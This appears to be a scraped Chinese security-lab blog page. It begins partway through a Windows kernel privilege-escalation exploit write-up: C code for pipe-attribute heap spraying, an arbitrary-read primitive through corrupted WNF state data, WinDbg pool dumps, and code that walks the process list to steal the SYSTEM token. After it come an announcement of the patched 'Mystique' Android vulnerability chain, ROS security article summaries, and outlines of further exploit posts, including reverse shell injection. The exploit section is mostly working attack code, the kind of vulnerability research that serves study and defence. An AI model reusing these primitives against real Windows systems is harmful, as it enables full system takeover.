char data [0];
};
typedef struct {
HANDLE read;
HANDLE write;
} PIPES;
// 初始化pipe
void pipe_init(PIPES* pipes) {
if (!CreatePipe(&pipes->read, &pipes->write, NULL, 0x1000)) {
printf("createPipe fail\n");
return 1;
}
return 0;
}
// 写入PipeAttribution
int pipe_write_attr(PIPES* pipes, char* name, void* value, int total_size) {
size_t length = strlen(name);
memcpy(tmp_buffer, name, length + 1);
memcpy(tmp_buffer + length + 1, value, total_size - length - 1);
IO_STATUS_BLOCK  statusblock;
char output[0x100];
int mystatus = NtFsControlFile(pipes->write, NULL, NULL, NULL,
&statusblock, 0x11003C, tmp_buffer, total_size,
output, sizeof(output));
if (!NT_SUCCESS(mystatus)) {
printf("pipe_write_attr fail 0x%x\n", mystatus);
return 1;
}
return 0;
}
// 读取PipeAttribution
int pipe_read_attr(PIPES* pipes, char* name, char* output,int size) {
IO_STATUS_BLOCK statusblock;
int mystatus = NtFsControlFile(pipes->write, NULL, NULL, NULL,
&statusblock, 0x110038, name,strlen(name)+1,
output, size);
if (!NT_SUCCESS(mystatus)) {
printf("pipe_read_attr fail 0x%x\n", mystatus);
return 1;
}
return 0;
}

理想情况下的堆布局如下所示，ffffdd841d4b6850是之前被覆盖的_WNF_STATE_DATA对象，其余的chunk被释放，然后使用PipeAttribution对象堆喷重新占回。

1: kd> !pool ffffdd841d4b6850
Pool page ffffdd841d4b6850 region is Paged pool
 ffffdd841d4b6010 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b60d0 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6190 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6250 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6310 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b63d0 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6490 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6550 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6610 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b66d0 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6790 size:   c0 previous size:    0  (Free)       NpAt
*ffffdd841d4b6850 size:   c0 previous size:    0  (Allocated) *AAAA
Owning component : Unknown (update pooltag.txt)
 ffffdd841d4b6910 size:   c0 previous size:    0  (Allocated)  NpAt  // 被攻击的数据结构
 ffffdd841d4b69d0 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6a90 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6b50 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6c10 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6cd0 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6d90 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6e50 size:   c0 previous size:    0  (Free)       NpAt
 ffffdd841d4b6f10 size:   c0 previous size:    0  (Free)       NpAt
1: kd> dq ffffdd841d4b6910 
ffffdd84`1d4b6910  7441704e`030c0000 00000000`00000000              // PoolHeader
ffffdd84`1d4b6920  ffffdd84`1c8e6cb0 ffffdd84`1c8e6cb0              // list
ffffdd84`1d4b6930  ffffdd84`1d4b6948 00000000`00000078              // AttributeName AttributeValueSize 
ffffdd84`1d4b6940  ffffdd84`1d4b6950 00313330`315f6161              // AttributeValue
ffffdd84`1d4b6950  61616161`00000407 61616161`61616161
ffffdd84`1d4b6960  61616161`61616161 61616161`61616161
ffffdd84`1d4b6970  61616161`61616161 61616161`61616161
ffffdd84`1d4b6980  61616161`61616161 61616161`61616161

根据上面讲述的方法实现任意地址读函数

int ab_read(void* addr, void* dst, int size) {
WNF_CHANGE_STAMP stamp;
char readData[0x400];
ULONG readDataSize = sizeof(readData);
NTSTATUS st;
static char wtf_buf[0x1000];
st = NtQueryWnfStateData(oobst, 0, 0, &stamp, readData, &readDataSize);
if (!NT_SUCCESS(st)) {
DEBUG("NtQueryWnfStateData fail %x\n", st);
return 1;
}
PipeAttr* pa = (PipeAttr*)(readData + CHUNK_SIZE);
pa->value = addr;
if (size < 0x20)
pa->value_len = 0x100;
else
pa->value_len = size;
st = NtUpdateWnfStateData(oobst, readData, readDataSize, 0, 0, 0, 0);
if (!NT_SUCCESS(st)) {
DEBUG("NtQueryWnfStateData fail %x\n", st);
return 1;
}
if (pipe_read_attr(&pipes, attackName, wtf_buf, sizeof(wtf_buf))) {
return 1;
}
memcpy(dst, wtf_buf, size);
return 0;
}

任意地址写

我通过修改_WNF_NAME_INSTANCE结构体内的指针_WNF_STATE_DATA实现任意地址写。具体操作是再次释放掉原来的PipeAttribution，使用_WNF_NAME_INSTANCE重新进行堆喷，布局好的堆如下所示

1: kd> !pool ffffdd841d4b6850
Pool page ffffdd841d4b6850 region is Paged pool
 ffffdd841d4b6010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b60d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6250 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b63d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b66d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
*ffffdd841d4b6850 size:   c0 previous size:    0  (Allocated) *AAAA
Owning component : Unknown (update pooltag.txt)
 ffffdd841d4b6910 size:   c0 previous size:    0  (Allocated)  NpAt
 ffffdd841d4b69d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0 // 被修改_WNF_STATE_DATA指针的WNF对象
 ffffdd841d4b6a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0

通过局部地址读写，覆盖掉下一个Wnf结构体（ffffdd841d4b69d0 ）里的_WNF_STATE_DATA，使用对应的结构体进行NtUpdateWnfStateData操作，即可实现任意地址写。

Windows权限提升

windows权限提升的方法一般都是遍历进程链表，找到高权限进程的token（8字节），替换当前进程的token。

// 循环遍历进程链表，搜索process_id为4的进程，读取其token
  ULONGLONG token_addr = eprocess + token_offset;
UCHAR* begin_eprocess = eprocess;
while (1) {
ULONGLONG process_id;
ab_read(eprocess + process_id_offset, &process_id, 8);
if (process_id == 4) {
break;
}
UCHAR* tmp;
ab_read(eprocess + link_offset, &tmp, 8);
tmp -= link_offset;
if (tmp == begin_eprocess) {
break;
}
eprocess = tmp;
}
ULONGLONG token;
ab_read(eprocess + token_offset,&token, 8);
DEBUG("system token %016llx\n", token);

最后执行cmd。

总结

该漏洞的触发条件并不复杂，利用过程也比较简单，虽然windows的堆分配已经有了很大的随机化，但是大力出奇迹，很容易能够得到理想的堆布局，本地实验过程中的exp基本很少将系统打崩溃。写exp的主要时间是在学习windows系统调用如何传参，查阅了很多文档才搞清楚WNF的用法。总体来说难度不大，非常适合初学者入门。

魔形女

2021-09-27T08:27:04.000Z

漏洞检测工具下载，测测你的设备是否安全!
For English version please click here.

什么是魔形女漏洞？

“魔形女”漏洞展示了一个此前未曾发现的新的攻击路径，在最新的安卓11（漏洞发现时最新的Android版本）上能够稳定打破安卓应用沙箱防御机制。通过多个零日漏洞组合，攻击者的零权限恶意应用程序可以在用户无感知的情况下绕过安卓应用沙箱，攻击任何其他应用，如Facebook、WhatsApp等。读取应用程序的数据，获取应用权限。我们给这条链命名“魔形女”源于著名的漫威漫画人物，因为它拥有类似的能力。

是远程代码执行漏洞吗？

不是，“魔形女”本身是一个本地权限提升漏洞。但可与其他远程漏洞相结合，例如可配合另外一个我们发现的RCE漏洞: CVE-2021-0515（该漏洞会另行介绍）。

漏洞修复了吗？

是的。漏洞已经报送给各个相关厂商，并得到了公开致谢。已公开的漏洞编号为：CVE-2021-0691, CVE-2021-25450, CVE-2021-0515, CVE-2021-25485, CVE-2021-23243等。安卓12系统和2021年9月安全补丁版本以上的安卓11系统已修复该漏洞，部分厂商也已在更早前backport了对应的补丁。您可用我们提供的检测工具来检测您的系统是否被该漏洞攻击。

历史上出现过类似的漏洞吗？这个漏洞有什么特殊的价值？

安卓历史上也偶尔出现过能够获取所有APP隐私数据和权限的用户态漏洞，但随着近年来安卓防御机制的增强和代码质量的提高，能达到类似攻击效果的漏洞可谓凤毛麟角，而本次利用原本固若金汤的安卓沙箱防御机制的微小缺陷，结合各大手机厂商设备中零日漏洞组合设计的”魔形女“漏洞链，从用户侧打破了App包安装后包文件只读的默认假设。

这个漏洞跟手机硬件相关吗？影响范围多大？

不相关，所有未打补丁的安卓11手机都会受到此漏洞的影响，鸿蒙不受影响（沸腾了！）。根据版本装机量统计，目前全球约有至少8亿的Android设备受影响。

绕过了什么安全防御机制？

安卓沙箱防御：每个安卓应用都运行在自己的沙箱内，应用代码是在与其他应用隔离的环境中运行，数据也默认互相隔离；默认情况下，每个应用都在其自己的Linux进程内运行，其他应用不能访问，并受MAC SELinux机制沙箱限制，就像酒店的每个房间都有自己的钥匙，不同房间的客人不能默认互相串门一样。同时，针对内存破坏漏洞还有ASLR、Stack cookie甚至CFI等机制防御。

但魔形女漏洞绕过了这些防线，获得了酒店房间的万能钥匙。

致谢

CVE-2021-0691:  A-188554048 EoP 11 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-0691)
CVE-2021-0515:  A-167389063 RCE8.1, 9, 10, 11 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-0515)
SVE-2021-21943 (CVE-2021-25450): Affected versions: O(8.1), P(9.0), Q(10.0), R(11.0) (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25450)
SVE-2021-22636 (CVE-2021-25485): Affected versions: Q(10.0), R(11.0) (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25485)
CVE-2021-23243 EoP (https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-23243)

Android致谢：https://source.android.com/security/overview/acknowledgements
三星致谢：https://security.samsungmobile.com/securityUpdate.smsb
Oppo致谢：https://security.oppo.com/cn/noticeDetail?notice_only_key=20211632987608199

行业专家点评(排名不分先后)

徐昊 Pangu Team/犇众信息联合创始人兼CTO

该研究成果向我们展示了串联漏洞的攻击威力。通过AOSP中的一行变更产生的逻辑隐患，再结合不同厂商的前置漏洞利用，可以达到读取APP数据、注入APP代码执行等非常有实际价值的攻击。

王琦（大牛蛙） KEEN和GeekPwn创办人

Mystique漏洞特点准通杀、影响面广、利用稳定。类似的漏洞公开发现的已经很少，且因角度新颖即使在野利用也不易被发现。安卓生态会因为这种遗珠式漏洞的修复变得更加安全。

陈良著名安全研究专家，三度“世界破解大师”（Master of PWN）

这是一种在安卓框架下非常新颖的攻击模式，可以隐蔽的窃取用户隐私甚至控制手机。

检测工具

我们提供的检测工具和SDK可供使用者检测

自己的手机是否曾被该漏洞的攻击代码攻击过
开源链接：https://github.com/DawnSecurityLab/Mystique_Detection_SDK
结果仅供参考，可能有不准确的地方。如有疑虑请联系我们 dawnsecuritylab # jd.com。

下载链接

自动化漏洞挖掘框架

自动化漏洞挖掘框架是京东安全自研的自动化/半自动化漏洞挖掘框架，基于人工智能的静态程序分析和动态模糊测试技术，结合专家经验，可对泛IoT设备/系统、APP等进行全面而深入的漏洞挖掘和隐私风险发现，从源头上及时发现并切断风险。仅在上半年我们使用该框架挖掘了数十个CVE，此次魔形女漏洞的发现即借助了该框架的能力。

现框架开放内测中，有兴趣的研究团队/企业，欢迎垂询实验室邮箱 dawnsecuritylab # jd.com。

研究成果发表和细节披露计划

为了保护终端用户，鉴于修复情况，我们不会立即发布漏洞细节，我们会在11月份的相关会议上发表和披露该项研究细节。敬请期待。

探秘ROS安全系列(二) 机器人操作系统ROS安全方案及趋势

2021-09-14T09:32:18.000Z

近年来国内外机器人产业不断升温，智能服务机器人已逐渐进入大众视野。其中不少厂家都在使用Robot Operation System（机器人操作系统，简称ROS）但由于ROS最初诞生于实验室环境并以科研为目标场景，因此一开始缺乏系统整体性安全设计。随着ROS项目开源和广泛应用，很多安全问题随之暴露，成为安全从业者研究的热门方向。
《探秘ROS安全系列》是京东安全自主研究和编写的系列文章，此系列将从ROS简介＆背景、安全分析与设计、安全方案与趋势、安全方案详解、京东ROS安全研究实践等部分，详细介绍京东安全对于ROS安全的研究和实践，希望能够与大家一同探讨。
本文是整个系列第二期，将从ROS安全方案和安全研究趋势两部分内容出发，供大家了解现有ROS安全研究情况。
全文

探秘ROS安全系列(一) 机器人操作系统ROS及其安全演进

2021-09-14T06:50:42.000Z

近年来国内外机器人产业不断升温，智能服务机器人已逐渐进入大众视野。其中不少厂家都在使用Robot Operation System（机器人操作系统，简称ROS）但由于ROS最初诞生于实验室环境并以科研为目标场景，因此一开始缺乏系统整体性安全设计。随着ROS项目开源和广泛应用，很多安全问题随之暴露，成为安全从业者研究的热门方向。
《探秘ROS安全系列》是京东安全自主研究和编写的系列文章，此系列将从ROS简介＆背景、安全分析与设计、安全方案与趋势、安全方案详解、京东ROS安全研究实践等部分，详细介绍京东安全对于ROS安全的研究和实践，希望能够与大家一同探讨。
本文是整个系列第一期，将从ROS背景、安全分析与设计两部分出发，供大家了解ROS基本情况和安全威胁与设计。

全文

京东獬豸信息安全实验室

悬挂的指针、脆弱的内存──从一个未公开的漏洞到 Pixel 9 Pro 提权

初步分析

利用过程

探索 race 入口

判断 race 时机

Timeout and win the race

Page UAF → Get root

漏洞历史

总结

References

漫步安卓物理内存：CVE-2025-21479 提权实录

背景

Catch the bug from diff

构建内核物理地址读写原语

为TTBR0构建受控页表

定位受控页表

实现任意物理地址写

实现任意物理地址读

物理基址探测与内核信息泄露

定位内核物理内存基址

直接内存dump的效率瓶颈

策略转变： targeting PTE 页表

带着内核符号攻克内核

策略一：直接代码段修补（针对默认防护）

策略二： data only attack

攻克SELinux：精准绕过强制策略

策略一：禁用SELinux初始化状态（已弃用）

策略二：操纵策略库实现恒允访

向 init 注入 reverse shell shellcode

总结与思考

参考

Netfilter Tunnel 之殇：CVE-2025-22056

一、背景介绍

1.1 什么是 Netfilter？

1.2 为什么是 Netfilter？

1.3 什么是 Netfilter Tunnel？

二、漏洞分析

2.1 Basics

2.2 OOB-Write

2.3 OOB-Read

三、漏洞利用

3.1 Leak heap addr

3.2 Root by io_uring table

3.3 Root by pipe_buffer

四、实机演示

References

无法摆脱的追踪

城堡的小门：v8类型混淆漏洞CVE-2024-4761分析

1. 前言

2. 背景知识

2.1 如何触发SetOrCopyDataProperties()​

2.2 SetOrCopyDataProperties()​的作用

3. 漏洞根因

4. 构造POC

4.1 创建WasmArray​对象

4.2 进入SetOrCopyDataProperties()​

4.3 触发NormalizeProperties()​

4.4 完整POC

5. 总结

6. Reference

安卓GPU漏洞攻防介绍

背景

认识GPU

Shader编程

GPU内存模型

GPU漏洞回顾

CVE-2024-23380漏洞分析

漏洞利用

总结

参考资料

HarmonyOS NEXT编译器arkcompiler代码阅读初探

背景

panda字节码格式

arkcompiler编译流程图

The Return of Mystique? Possibly the Most Valuable Userspace Android Vulnerability in Recent Years: CVE-2024-31317

Abstract

Origin of the Vulnerability

Analysis of this vulnerability

Zygote and system_server bootstrap process

2.1 如何触发`SetOrCopyDataProperties()`

2.2 `SetOrCopyDataProperties()`的作用

4.1 创建`WasmArray`对象

4.2 进入`SetOrCopyDataProperties()`

4.3 触发`NormalizeProperties()`

Attempt #1: Can we control Zygote to execute a specific package name with a particular `uid`?

Method #2: Leveraging the `jdwp` Flag

The Challenge: Predicting `startSeq`

3.2.1 绕过`EquivalentToForNormalization()`的检查

3.2.2 `Normalize()`后map中可控的字段

3.3.1 `NumberDictionary`的内存布局

3.3.2 伪造`NumberDictionary`对象